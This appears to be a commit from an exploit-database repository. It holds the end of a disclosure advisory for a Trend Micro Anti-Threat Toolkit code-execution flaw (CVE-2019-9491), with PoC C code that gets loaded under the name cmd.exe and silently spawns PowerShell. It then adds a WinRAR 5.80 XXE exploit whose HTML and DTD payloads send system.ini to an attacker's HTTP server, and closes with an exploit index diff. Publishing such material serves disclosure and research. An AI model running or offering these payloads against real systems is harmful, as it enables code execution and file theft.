Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections.
It can be used to perform system forensic scans and clean the following infection types:
General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..
[Vulnerability Type]
Remote Code Execution
[CVE Reference]
CVE-2019-9491
[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author
happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be
placed in the vacinity of the ATTK when a scan is launched by the end user.
Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings
are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as
each time the Anti-Threat Toolkit is run so can an attackers malware.
Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.)
attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1
TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f
attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed
[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223
[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.
#include <windows.h>
void main(void){
puts("Trend Micro Anti-Threat Toolkit PWNED!");
puts("Discovery: hyp3rlinx");
puts("CVE-2019-9491\n");
WinExec("powershell", 0);
}
[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

38
exploits/xml/local/47526.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: albalawi
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
# POC
1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window
html file
<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>
==============================
start.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;

8
files_exploits.csv
View file

@ -6579,6 +6579,8 @@ id,file,description,date,author,type,platform,port
47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10716,7 +10718,7 @@ id,file,description,date,author,type,platform,port
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
47502,exploits/linux/local/47502.py,"sudo 1.2.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,
47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,
@ -10727,6 +10729,9 @@ id,file,description,date,author,type,platform,port
47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
47526,exploits/xml/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,xml,
47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41844,7 +41849,6 @@ id,file,description,date,author,type,platform,port
47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux,
47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,

Can't render this file because it is too large.